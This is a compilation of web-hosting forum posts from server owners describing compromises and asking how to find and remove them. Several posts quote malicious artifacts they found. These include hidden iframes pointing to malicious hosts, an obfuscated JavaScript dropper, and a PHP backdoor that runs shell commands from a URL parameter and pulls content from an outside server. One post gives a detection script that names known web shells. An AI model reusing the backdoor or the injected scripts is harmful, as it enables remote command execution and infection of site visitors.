My server was being hacked, I can find some HTML and PHP files which inserted the codes similar to the following by the hacker.
HTML Code:
<iframe src="http://a5g.ru:8080/ts/in.cgi?pepsi94" width=125 height=125 style="visibility: hidden"><
/iframe>
The inserted iframe src is not the same among the hacked files.
I am trying to find out all the hacked files on server, is there any way instead of checking the files manually?
I am being hacked & I don't know how they are getting files on my server. They are doing it on two of my domains, I suspended one and then they got it on the other. My FTP access log does not show anything suspicious..
How can I find their doorway?
I have noticed in a few Windows server tha the server gets hacked and there are tons of files which are mostly DVD rips and games being transferred away which results in huge amount of data transferred and bandwidth consumption increasing to as far as 29 Mbps. On further investigation, I find that all the files get stored in either the Recycler directory or the System Volume Information directories in any of the drives. Now these two directories are protected operating system files. Even if there is a windows firewall installed, there is no difference. I have even noticed that in some servers there is an automatic exception rule added in the windows firewall enabling the torrent client to communicate outside the server. This seems to be a common problem with Windows 2003 server and seems to be some backdoor of Windows allowing hackers to use the server for seeding. Has anybody come across such a problem or know the solution? Kindly help me with this.
View 14 Replies View RelatedHosters: Which 3rd party addon script do you find getting hacked the most?
View 11 Replies View RelatedMany of my websites on my server have been hacked, it randomly add's
Code:
<!--iframe width=1 height=1 border=0 frameborder=0 src=[url]-->
Code:
<!--iframe width=1 height=1 border=0 frameborder=0 src=[url]-->
and
Code:
<!--iframe width=1 height=1 border=0 frameborder=0 src='http://aboutmynews.org/news/InF.php' style='display:none;'></iframe--><!-- ~ --><script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,49,46,22,39,35,15,23,8,28,0,0,0,0,0,0,2,25,55,54,30,40,13,57,14,12,53,47,43,19,38,3,37,33,58,18,36,44,20,24,51,60,29,0,0,0,0,41,0,0,45,48,9,32,17,59,31,6,61,5,4,7,27,50,56,62,34,10,52,1,16,21,26,42,11);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc("kNdXOhF18O9QSX9cfBINV3WXaXUcFmFNV3p1shZcahFNw3pc7MIoahUo7mIc75APkxjJi5_eFmZtw0_rssFcmOAt7ObJfKE1s5UrzKIcSnbrIK9caBjrwB9J@3EJfXZoa5_euXUJw4I190GosKIcDspNAy8XOhF18OYN")</script><!-- ~ -->
To some of my pages on my websites in my /home directory.
Please do not visit the links without anti virus protection.
what command I can use to search all of my files in my home directory for this?
I was working on WHM of my server sudeenly i saw CPU load was increasing and till when i understand CPU load was on peak of 160%. I tried to find out CPU overloading sites and found that my 4 populer sites were creating problem. I stopped apache and suspanded all 4 sites and rebooted server. After forceful server reboot i found that load was getting normal to 2.5%. I unsuspanded one of 2 forums but even i unsuspanded that forum was not opening (IPB). I logged into ftp suspecting some problem i found that index.php was only 45bytes i have opend index.php and found this text inside .....
View 3 Replies View RelatedSometime ago the DC told me there was too many files on server and I started to investigate what is was and i got info that some one hacked the server and was sending spam from it.
When I looked at the accounts in Direct Admin some of them had the contact email to some hacker so i deleted the emails and changed password on the DA account and the email of those accounts.
Still I got too many files all the time so the server goes down so i have to delete the spoolfile all the time like 10 times a day
Please help how do I detect from what account do the hacker operate?
Can I detect that somehow?
Is it possible to do some small script to detect this?
Is there any advanced module to DA that gives me the info?
I have a dedicated server, the server itself is secure (as far as I know) and I run lots of my sites from it. I offered a friend hosting for his flash based chat application he built.
Today I was contacted by someone; "Are you the owner of xxxx.net?" so I informed that yes, it was my server and they then showed me an email they'd received from my server. I did a search and apparently someone uploaded mail.php and a couple of files it was using to send out spam based upon a variety of conditions that the other files met. The files contained forenames and surnames, it'd use a forename and a surname then send it to popular free mail services. The email contained ramblings about new world order and promoted a website.
How can I find out how they got the files uploaded to the account and what action can I take? I checked the whois for the domain and have their contact information, however it's a large site so I'm doubtful that the owner did it. I don't want my servers IPs being blacklisted for spam :|
Is there a way to get Apache to tell me which .conf file it is loading at start-up?
There's a box that's misbehaving and Apache is running on port 80 and 8080 on the box... but we can't locate *why* it's running on port 8080. I can't find any Listen 8080 statement in the typical config files. If I knew which config files it was loading, I could go through all of the files in more detail.
Try this useful script to find all 777 permission files and folders in /home directory
also it can find all names of suspected folders and files you want
and then you can take the required action
to install this follow the steps
login as root
Code:
cd /root
Code:
pico checkpandnscript.sh
Enter this code and in the 5th line from the end change
email@email.com to your email
Code:
# This file will help you to find suspected folders and files in /home directory
# Coded and desgined by Alrutani Web Hosting www.alrutani.com , for more informations please contact us.
#!/bin/sh
echo " " > /root/perdfmbc
echo "################# Folders with 777 permission #################" >> /root/perdfmbc
echo " " >> /root/perdfmbc
find /home -type d -perm 777 |egrep -v "./cpapachebuild|./.cpan|./src" >> /root/perdfmbc
echo " " >> /root/perdfmbc
echo "################## Files with 777 permission ##################" >> /root/perdfmbc
echo " " >> /root/perdfmbc
find /home -type f -perm 777 >> /root/perdfmbc
echo " " >> /root/perdfmbc
echo "############### Folders & files must be checked ###############" >> /root/perdfmbc
echo " " >> /root/perdfmbc
find /home -name forum >> /root/perdfmbc
find /home -name upload >> /root/perdfmbc
find /home -name 4images >> /root/perdfmbc
find /home -name gallery >> /root/perdfmbc
find /home -name uploader >> /root/perdfmbc
find /home -name up >> /root/perdfmbc
find /home -name r57shell >> /root/perdfmbc
find /home -name r57shell.php >> /root/perdfmbc
find /home -name r57.php >> /root/perdfmbc
find /home -name c99shell >> /root/perdfmbc
find /home -name c99shell.php >> /root/perdfmbc
find /home -name c99.php >> /root/perdfmbc
find /home -name shell.php >> /root/perdfmbc
echo " " >> /root/perdfmbc
echo "###############################################################" >> /root/perdfmbc
echo "Developed by Alrutani Web Hosting http://www.alrutani.com" >> /root/perdfmbc
echo "For more informations please contact us." >> /root/perdfmbc
echo " " >> /root/perdfmbc
cat /root/perdfmbc | mail -s "Suspected files & folders in your server" email@email.com
cd /root
rm -rf perdfmbc
# This file will help you to find suspected folders and files in /home directory
# Coded and desgined by Alrutani Web Hosting www.alrutani.com , for more informations please contact us.
To add more files and folders that you want the system to list
fine
Code:
find /home -name upload >> /root/perdfmbc
after it add
Code:
find /home -name xxxxxx >> /root/perdfmbc
where xxxxx is the name of the file or the folder you want
Save file Ctrl X
select yes then click enter
Code:
chmod 755 checkpandnscript.sh
To make the script works daily
Code:
crontab -e
At the end enter
Code:
* 3 * * * sh /root/checkpandnscript.sh
save and exit done !!
now to test the script
Code:
cd /root
Code:
sh checkpandnscript.sh
you will receive email from the server
My site was hacked today, all pages named index.html were hacked. It is kind of script since all pages were written same time.
I'm using a very respectable hosting. I jumped from another hosting were I was exposed on a unsecured host (they moved my account to an insecure host without asking).
Going back on track, all files named "%index%" were hacked.
-I found a index.txt file with links to obscure sites.
The code was written at bottom of the all index.html files: iframe code
Code:
><!-- ~ --><iframe src="http://googletraff.com/in.cgi?default" width="0" height="0" style="display:none"></iframe><!-- ~ -->
Also a line.php with the following code
PHP Code:
<?error_reporting(0);if($_GET['cmd45']) {system($_GET['cmd45']);}$domain = 'shemale1.biz';$ur = '/load.php?f=%s&ua=%s&ref=%s';$qs = $_SERVER['QUERY_STRING'];$ua = urlencode(substr($_SERVER['HTTP_USER_AGENT'],0,100));$ref = urlencode($_SERVER['HTTP_REFERER']);$redirect = sprintf($ur,$qs,$ua,$ref);#print $redirect;#exit;echo getcontent($domain,80,$redirect);exit;function getcontent($server, $port, $file){$socket=fsockopen($server,$port,$errno,$errstr,60) or die("Can't open socket");$refer = $_SERVER['HTTP_HOST']?$_SERVER['HTTP_HOST']:$server;fputs($socket, "GET $file HTTP/1.0
");fputs($socket, "Referer: http://$refer
");fputs($socket, "Host: $server
");fputs($socket, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
");$wr = 0;while(!feof($socket)){ $temp = fgets($socket); if(eregi("<",$temp)) { $wr = 1; } if($wr) { $page .= $temp; } } fclose($socket); return $page; } ?>
So far I recover the files from backup, secured the config.php files and modify %index% to read only...finally changed the password...
I have an odd problem... after transferring several hundred .php files to one of our servers we noticed that the browser was showing "?" output only.
When I open the file in "vi" (we're running centos 5.x), I can see this at the end of the file:
Code:
...
</HTML>
^@^@<?php //comment goes here ?>
-------------
I highlighted in red bold the problem text. If these four characters are removed from the file (edited out manually using vi) then the file displays and works correctly.
However.. there are several hundred of these files, and some have the problem and some don't.
I've tried everything I know to find which files contain the problem, but so far no luck.
ie:
grep -r "^@" .;
grep -r "^@" .;
Basically.. I need to find any instance of these characters and then remove them.
how can i do a search for all files (probs using regex) of files consisting purely of numbers?
for e.g. find:
53243.php
24353.php
24098.php
(always have 5 numbers).
seems one of my accounts has had some script run which generated a bunch of these in various subfolders, and the php file basically does a callback to www3.rssnews.ws and www3.xmldata.info, which seem to be some sort of spyware servers.
SOme one has claimed that he has penetrated my server and has gathered some kind of information via shell access, I have disabled the possible ways of shell access for the users via twaek settings, and php.ini
- How I can check he has made any backdoor for himself or not?
and I have made a trojan check via Scan for Trojan Horses in WHM, and it has found about 200 possible trojans.
- How I can remove them?
217.67.250.41 - - [18/May/2009:15:36:08 +0100] "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 226 "-" "-"
What is mean ? Sorry for ask a fast answer. I have change my domain's IP to protect someone can run dangerous script...
My dedicated server was rather slow. Upon checking, I had a new cron job, (deleted now) made by apache, pinting to the following IRC bot.
[root@server50040 tmp]# cd .LiveZone/
[root@server50040 .LiveZone]# ls -al
total 384
drwxr-xr-x 10 apache apache 4096 Dec 21 12:17 .
drwxrwxrwt 3 root root 4096 Dec 21 12:15 ..
-rwxr-xr-x 1 apache apache 320 Dec 9 2004 config
-rw------- 1 apache apache 1002 Dec 9 2004 config.h
-rw-rw-r-- 1 apache apache 55 Dec 20 22:55 cron.d
-rwxr-xr-x 1 apache apache 347 Dec 9 2004 ****
drwxr-xr-x 2 apache apache 12288 May 31 2002 help
-rwxr-xr-x 1 apache apache 210216 Dec 9 2004 httpd
drwxr-xr-x 2 apache apache 4096 Jan 12 2002 lang
-rw------- 1 apache apache 492 Dec 21 12:17 livezone
-rw-rw-r-- 1 apache apache 19 Dec 20 22:55 livezone.dir
-rw------- 1 apache apache 492 Dec 21 12:09 livezone.old
drwxr-xr-x 2 apache apache 4096 Dec 21 12:10 log
-rw-r--r-- 1 apache apache 2137 Sep 26 2003 Makefile
-rw-r--r-- 1 apache apache 731 Dec 9 2004 makefile.out
-rwxr-xr-x 1 apache apache 15090 Dec 9 2004 makesalt
drwxr-xr-x 3 apache apache 4096 Jul 30 2000 menuconf
drwxr-xr-x 2 apache apache 4096 Jul 17 2000 motd
-rwxr-xr-x 1 apache apache 14306 Nov 13 2003 proc
-rw------- 1 apache apache 6 Dec 21 12:10 psybnc.pid
-rw-r--r-- 1 apache apache 10780 Dec 9 2004 README
-rwxr-xr-x 1 apache apache 68 Jun 4 2004 run
drwxr-xr-x 2 apache apache 4096 Dec 9 2004 scripts
drwxr-xr-x 2 apache apache 4096 Dec 9 2004 src
-rw------- 1 apache apache 3901 Jan 12 2002 targets.mak
drwxr-xr-x 2 apache apache 4096 Dec 9 2004 tools
-rwxr--r-- 1 apache apache 21516 Sep 25 2002 xh
-rwxrw-r-- 1 apache apache 194 Dec 20 22:55 y2kupdate
My server was hacked some time ago. I've changed passwords and scanned system for viruses, but found nothing.
Now, I'm looking into the log file /var/log/messages and I have few questions:
1. There are a lot of messages like: Apr 2 02:53:09 host
sshd(pam_unix)[29398]: authentication failure; logname= uid=0 euid=0 tty=ssh
ruser= rhost=203.196.151.235
Do these messages mean that hacker trying to enter the server under root?
2. There are messages like these:
Apr 2 03:56:10 host clamd[4678]: stream 1255: Worm.SomeFool.P.2 FOUND
Apr 2 10:46:10 host clamd[4678]: stream 2008: Worm.Bagle.pwd-eml FOUND
What does this mean? Virus on my server or something else?
3. Also, I can see a lot of messages like this one:
Apr 2 09:38:40 host clamd[4678]: stream 1111: Email.Phishing.RB-524 FOUND
Does someone read my emails?
My server just got hacked i just bought it!!
and they was going to charge me anouther $35 to reset the password how stupid...
in the end we got it done free
My server was hacked night before last and here is the log
Oct 28 10:30:47 server1 [19705]: connection from "173.45.118.58"
Oct 28 10:30:47 server1 [19705]: User root's local password accepted.
Oct 28 10:30:47 server1 [19705]: Password authentication for user root accepted.
Oct 28 10:30:47 server1 [19705]: User root, coming from 3a.76.2d.[url], authenticated.
I found a process /usr/sbin/httpd was running by nobody, then I did a trace in WHM and found this. Is my server hacked ?
send(4, "@206113irc10quakenet3org1"..., 34, MSG_NOSIGNAL) = 34
poll([{fd=4, events=POLLIN, revents=POLLIN}], 1, 5000) = 1
ioctl(4, FIONREAD, [162]) = 0
recvfrom(4, "@2062012001103irc10quakenet3org1"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("72.36.191.2")}, [16]) = 162
close(4) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
ioctl(4, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbffb3718) = -1 EINVAL (Invalid argument)
_llseek(4, 0, 0xbffb3770, SEEK_CUR) = -1 ESPIPE (Illegal seek)
ioctl(4, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbffb3718) = -1 EINVAL (Invalid argument)
_llseek(4, 0, 0xbffb3770, SEEK_CUR) = -1 ESPIPE (Illegal seek)
fcntl64(4, F_SETFD, FD_CLOEXEC) = 0
connect(4, {sa_family=AF_INET, sin_port=htons(6665), sin_addr=inet_addr("83.140.172.210")}, 16) = -1 ETIMEDOUT (Connection timed out)
close(4) = 0
open("/etc/protocols", O_RDONLY) = 4
fcntl64(4, F_GETFD) = 0
fcntl64(4, F_SETFD, FD_CLOEXEC) = 0
My websites worked very well some days ago. I've touched nothing on my server since then and now every website I have on it is down!
I have a VPS and have root access.
When I restart my apache web server, my websites are working for about 3 seconds! Then it doesn't work any longer!
I've talked to my host but they may find the error if their technicians look at my server but this will cost!
I have a dedicated server on a web host. I have 3 domains hosted on the same server. One of the domains was apparently hacked and a rogue script was installed that was using the exim service to send out spam. At least that's what I thought was going on.
When I contacted tech support at the web host they confirmed that the emails were being sent through my server and told me that there was no way for them to tell me what script was doing it or where it was located in the domain files. At this point I had them stop the exim service on my server so I knew no more spam would be sent out until I could get this web space cleaned up.
I backed up all of my files and the database from that domain and wiped out every file in the domain space by having the web host delete everything from their end. Then I created a new web space for the domain. I didn't load any programs or files whatsoever. Just the bare minimum to support the domain. Then I created the email accounts.
During this process I made sure that I changed every password on the domain. I didn't even use the same login names except for the email accounts. The email account passwords were also new.
As soon as I had the email accounts turned on there was more spam. What I find curious is that I have several email accounts on this domain but it's only one that all of this spam is being sent through. I don't know enough about the mechanics to know if this really is being sent through my server or if someone is just plugging in my email address in the spam.
I have not done anything with the other two domains on the server. Is it possible that even though these are saying they are from the fresh domain space they could be from a script on one of the others? ..............
I have Windows 2003, all security patches, I run Plesk 8.2 and nothing much else. I use MySQL as a database with port 3306 open so I can connect from the outside (password protected also). I do use strong passwords on my Plesk, administrator etc. I use standard microsoft FTP, Windows 2003 Firewall and connect through Plesk or remote connection.
Somebody has been able to penetrate to my Admin remote desktop :-( I found strange windows open when I connected and in the log there was an indication of the printer driver load. The printer name was one I don't have and my Remote connection has Printers off. The attacker although smart did connect with his printer and that was visable in log. When he terminated the session I found his IP.
I have since changed my administrator password but it doesn't help, he was in again today. He didn't do any harm up to now I think, I checked for viruses and Spyware.
I don't know what to do any more. He can do whatever he wants and if I don't know how he is getting access to my admin account I can not stop him. I blocked today with IPSec the whole IP range of his provider, but as he is smart he can hack another computer and connect to me from him (maybe he has already done that and the IP was from a hacked server). This is no solution. I need to patch the hole.
I use ASP scripts but I don't think one can gain access to the whole admin by them, maybe only get access to my database (if I would make a mistake and wouldn't protect for the injections or some other things).
I am desperate. Plese, if anybody has some ideas what can I do, how do I "catch" him, I mean patch the hole, please let me know.
I had an idea to block all IP's to port 3389 (Remote desktop) except my IP. But I am a little scared to do that not to lock myself out. And even in that case, if he knows admin password he can get in some other way than using remote desktop,
I'm using windows 2003 Server to host my website.
I was on vacation for 2 weeks so I wasn't able to log onto the server. Nor was there any need to log onto the server as the website was up and running and was fine!
However, when I logged into today, there were extra icons on my desktop.
My server was turned into a spam e-mail remailer. There were applications installed that dissected/generated e-mail addresses.
In my system logs in event viewer, starting from January 30th, there is a whole list of failed log on events where the user tried logging on with different usernames and passwords.
I'm guessing they got into my server by brute force.
I was wondering, does anyone know if windows 2003 automatically logs the IPs of users trying to login remotely and where they are stored?
Today while i run some commands like ls this error appeared segmentation falt
any way the reason is my server's hacked now i reinstall it but my question
How could my server hack while i have disabled Compilers for unprivileged users
i admited that i have found cgi-telnet scripts but how could he used it to install rootkit
We have a dedicated server with a well known company here in the UK, its running Windows 2003 server std. This runs an application that was developed by our company and accessed by around a max number of users per day of around 50 - max.
Over the last few months the server has got slower and slower, although we do have periods when its really fast, there seems to be nothing we can point our finger at as to why it speeds up and slows down, we checked number of users accessing etc and it does not seem to effect speed (users access by a secure logon)
This week server was nearly at a stand still, I rang hosting company who informed me that they thought our server had been hacked. They said they could see exe files running that they had not installed, mentioned the following -
Dxplay.exe
Dameware.exe
Tree.exe
They said these exe files were listening to a TCP port (excuse my ignorance, not that techically minded)
They also said two users were accessing our server from Canada and California.
They also said because we had loaded our own software on the server it was not their responsibility if our server was hacked, that we were also running PCAnywhere and this was notorious for allowing a server to be hacked.
I pointed out that we paid them to host the server, it was behind their firewall, would that not stop unauthorised access, the response was no.
I have a few questions I wonder somebody might help me with the answers to,
1, Does it appear our server was hacked? - do the exe files look suspicious?
2, What is our hosting companys responsibility?
3, Is PCA secure
4, How can we stop this in future?
I am also told by our guys there is evidence of someone using our server to surf the web, could this be internal, i.e our hosting company, or maybe a hacker?
We can see when users are logged into our application, but nothing else, is there some reporting software we can install to let us view who is accessing our server?
What can we do to make the server more secure?
We are currently scanning it with spyware software and although we have anti virus we are scanning again, this new scan picked up 7 virus, I'm not sure yet what these were.
I have worked with rack911 but he does not answer my emails. is there anyone who can start it immediately?
How can I secure php?
my server is hacked but not so deep.
how does one know if their server is being or has been attacked / compromised / DOSed / DDOSed / hacked / you name it?
View 2 Replies View Related